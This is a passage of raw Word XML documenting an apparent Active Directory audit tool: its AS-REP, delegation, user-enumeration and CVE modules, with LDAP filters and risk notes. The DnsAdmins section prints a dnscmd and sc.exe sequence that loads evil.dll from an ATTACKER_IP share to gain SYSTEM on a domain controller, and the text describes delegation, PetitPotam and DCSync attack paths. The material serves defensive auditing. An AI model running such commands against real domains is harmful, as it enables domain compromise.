          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc224561299"/>
      <w:r>
        <w:t>4.2  AS-REP Scanner  (--asrep)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="4B6D3131" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Finds all enabled domain accounts with the DONT_REQ_PREAUTH flag set in userAccountControl. These accounts do not require Kerberos pre-authentication, meaning any unauthenticated attacker can request an AS-REP blob for them and crack it offline. No credentials are required to perform the actual Kerberoast.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3705078F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FFBBDC" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc224561300"/>
      <w:r>
        <w:t>LDAP Filter</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69DB9CEE"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BD6C8A1" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(&amp;(userAccountControl:1.2.840.113556.1.4.803:=4194304)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="56FD3CB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9204B80" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  (!(userAccountControl:1.2.840.113556.1.4.803:=2)))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C0E78A4" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62370EB5" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc224561301"/>
      <w:r>
        <w:t>Scoring</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="753C1B81" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>AS-REP Roastable accounts receive a flat priority score of 75. Accounts that are also members of admin groups receive a score of 90, since cracking the hash yields immediate elevated access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF81755" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A3C7E8" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc224561302"/>
      <w:r>
        <w:t>4.3  Delegation Mapper  (--delegation)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="1338F9AF" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Maps all three Kerberos delegation types across the domain. Delegation misconfigurations are among the most commonly exploitable findings in mature AD environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCF5F5B" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D89E30D" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc224561303"/>
      <w:r>
        <w:t>4.3.1  Unconstrained Delegation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="1DD83E05" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Any account or computer with the TRUSTED_FOR_DELEGATION flag (bit 0x80000 in userAccountControl) caches the TGT of every user who authenticates to it. If an attacker compromises such a host, they can extract all cached TGTs and use them to impersonate those users anywhere in the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD0068F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Detection filter (Domain Controllers are excluded as they legitimately have this flag):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5BCFDE68"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6984D07" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(&amp;(userAccountControl:1.2.840.113556.1.4.803:=524288)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="5E80EA3D"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09425F4" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  (!(primaryGroupID=516))(!(primaryGroupID=521)))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="12A715E2" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Risk: CRITICAL. This is the most powerful delegation type. The typical attack pairs this with printerbug or PetitPotam to coerce the DC to authenticate to the compromised host, then extracts the DC's TGT for a DCSync.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFF2BE9" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4454F3" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc224561304"/>
      <w:r>
        <w:t>4.3.2  Constrained Delegation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="6E7BB6CE" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Accounts with the msDS-AllowedToDelegateTo attribute can only delegate to a specific list of SPNs. The scanner additionally checks for the TRUSTED_TO_AUTH_FOR_DELEGATION flag (Protocol Transition / S4U2Self), which allows the account to request a Service Ticket on behalf of any user without that user actually authenticating first.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B20F672" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Risk: HIGH if protocol transition is enabled, MEDIUM otherwise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9B45C2" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D01539" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc224561305"/>
      <w:r>
        <w:t>4.3.3  Resource-Based Constrained Delegation (RBCD)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="76CAD4D7" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>RBCD is configured on the target object itself via the msDS-AllowedToActOnBehalfOfOtherIdentity attribute. If an attacker has GenericWrite or WriteDACL over a computer object, they can write this attribute, add a machine account they control, and obtain a Service Ticket impersonating any domain user to that computer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E543197" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFF66DD" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc224561306"/>
      <w:r>
        <w:t>4.4  User Enumerator  (--users)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="071A138A" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Performs broad passive enumeration of users, policies, and domain configuration. All queries are read-only LDAP. Findings feed directly into the scorer to identify password spray opportunities, trust abuse paths, and DnsAdmins escalation routes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6C5427"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1200"/>
        <w:gridCol w:w="3760"/>
      </w:tblGrid>
      <w:tr w:rsidR="00707BE4" w14:paraId="2EC066E9" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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6CE5066D" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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29346E86" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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5B80C5F2" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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7636C8C0" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="173015EF" w14:textId="77777777">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638C78C" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Privileged users</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B4C0399" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>adminCount=1</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E32F832" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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4687A7E" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Includes shadow admins — adminCount never auto-removes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="20E4DDF8" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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AC6235A" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Stale accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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E471003" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>lastLogonTimestamp threshold</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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73DEE2C" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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7DE6F8D4" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Accounts inactive since ~2020</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="52615648" w14:textId="77777777">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7243DCD" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Password policy</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463989F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>domainDNS attributes</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4BE2D99D" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>VARIES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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8C32B4F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Flags no lockout, weak length, reversible enc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="13E1DF3C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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7B37E729" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Domain trusts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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AAC1C63" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>trustedDomain objectClass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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7C9CB9F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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3955B72" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Flags SID filtering disabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="781F9FA7" w14:textId="77777777">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B3DCAD3" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>DnsAdmins</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C9AEC2C" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Group membership query</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E6346EE" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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1A4BE27" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>DLL injection into DNS service = SYSTEM on DC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="78F6905A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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703CC06D" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>LAPS status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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65AF120D" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ms-Mcs-AdmPwd presence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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85471B0" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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A9A352C" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>No LAPS = shared local admin password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="1254DDCA" w14:textId="77777777">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60CD5D1" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>GPO links</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57375FC" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>groupPolicyContainer enumeration</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49823431" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>INFO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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3190801" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Useful for manual review</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5CCD568A" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7DC2E6" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc224561307"/>
      <w:r>
        <w:t>DnsAdmins — Why It Matters</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="0FAAD86F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Members of the DnsAdmins group can use dnscmd to configure the DNS service to load an arbitrary DLL from a UNC path. Since the DNS service runs as SYSTEM on Domain Controllers, this is a trivial privilege escalation from DnsAdmins to SYSTEM on any DC.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684EC92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83DDCDD" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>dnscmd &lt;DC_NAME&gt; /config /serverlevelplugindll \\&lt;ATTACKER_IP&gt;\share\evil.dll</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="3B0C615C"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1879FDB" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>sc.exe \\&lt;DC_NAME&gt; stop dns</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="48568FFC"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4FFE73A" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>sc.exe \\&lt;DC_NAME&gt; start dns</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3BDE9050" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645317C4" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C397B6" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc224561308"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>5.  CVE Detection Modules  (--cves)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="04A01556" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>The CVE scanner runs a set of checks against known critical vulnerabilities and AD misconfigurations. Checks are divided into safe (LDAP-only, no event log noise) and aggressive (RPC probes that generate Windows events).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5F2D28"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3200"/>
        <w:gridCol w:w="1760"/>
      </w:tblGrid>
      <w:tr w:rsidR="00707BE4" w14:paraId="752AD08A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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3A5411C0" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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4639D1C2" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CVE / Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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3330E59B" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
